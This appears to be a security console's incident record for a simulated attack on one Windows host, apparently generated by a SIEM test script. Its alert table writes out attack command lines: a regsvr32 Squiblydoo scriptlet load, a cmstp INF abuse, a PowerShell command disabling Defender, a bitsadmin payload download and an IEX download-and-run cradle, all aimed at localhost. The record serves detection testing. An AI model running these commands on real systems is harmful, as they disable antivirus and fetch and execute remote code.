Back to list

Incident Overview

Incident ID CINC-20251221-B617816B
Severity Medium (70)
Status in_progress
Alert Count 7
Host Count 1

Timeline

First Seen 2025-12-22 08:01:30
Last Seen 2025-12-22 08:02:41
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Defense Evasion
Techniques:
User Execution Regsvr32 CMSTP PowerShell BITS Jobs

Affected Hosts (1)

BOOK-R0BE6S1NC3

Related Alerts (7)

Severity Status Hostname Description Tactic Command Line Time
Informational new BOOK-R0BE6S1NC3 A process has written a known EICAR test file. Review the files written by the triggered process. Execution "C:\app\cortex-xdr-siem-test\.venv\Scripts\python.exe" mega_incident_generator.py --rounds 2 --interval 30 12-22 08:02
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-22 08:02
High new BOOK-R0BE6S1NC3 A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\ubuntu\AppData\Local\Temp\test.inf 12-22 08:02
High new BOOK-R0BE6S1NC3 A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution C:\windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableRealtimeMonitoring $true" 12-22 08:02
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/test C:\Users\ubuntu\AppData\Local\Temp\bits.exe 12-22 08:02
High new BOOK-R0BE6S1NC3 A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\windows\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-22 08:02
Informational new BOOK-R0BE6S1NC3 A process has written a known EICAR test file. Review the files written by the triggered process. Execution "C:\app\cortex-xdr-siem-test\.venv\Scripts\python.exe" mega_incident_generator.py --rounds 2 --interval 30 12-22 08:01